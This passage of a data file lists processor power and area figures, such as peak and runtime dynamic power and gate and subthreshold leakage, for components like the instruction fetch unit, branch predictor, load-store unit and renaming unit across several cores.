'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00417854,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00417854,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00365895,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00142708,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00142347,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0134395,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0393685,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0952604,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.05938,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.360214,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.323547,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.57647,
'Instruction Fetch Unit/Runtime Dynamic': 0.831829,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0734183,
'L2/Runtime Dynamic': 0.0164294,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.12483,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.41181,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0934243,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0934243,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.5678,
'Load Store Unit/Runtime Dynamic': 1.96598,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.230368,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.460737,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0817585,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.082562,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.37675,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0599378,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.676593,
'Memory Management Unit/Runtime Dynamic': 0.1425,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.0499,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.38203e-05,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0189003,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.191359,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.210273,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 5.86579,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0495887,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.241638,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.265616,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.115524,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.186336,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0940563,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.395917,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0914043,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.47088,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0501805,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0048456,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0536937,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0358362,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.103874,
'Execution Unit/Register Files/Runtime Dynamic': 0.0406818,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.125518,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.311915,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.39553,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000350937,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000350937,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000322059,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00013364,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00051479,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00153872,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00277904,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0344503,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.19133,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0797619,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.117009,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.5162,
'Instruction Fetch Unit/Runtime Dynamic': 0.235539,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0462159,
'L2/Runtime Dynamic': 0.00399916,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.59016,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.654742,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.043774,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.043774,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.79687,
'Load Store Unit/Runtime Dynamic': 0.914394,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.107939,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.215879,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0383079,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0390002,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.136249,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0130814,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.358164,
'Memory Management Unit/Runtime Dynamic': 0.0520816,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.7778,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.132002,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00681857,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0567221,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.195543,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.79709,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0980777,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.279723,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.621299,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.189316,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.30536,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.154135,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.648812,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.121269,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.10233,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.117377,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00794077,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.090414,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0587269,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.207791,
'Execution Unit/Register Files/Runtime Dynamic': 0.0666677,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.215002,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.561929,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.96251,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
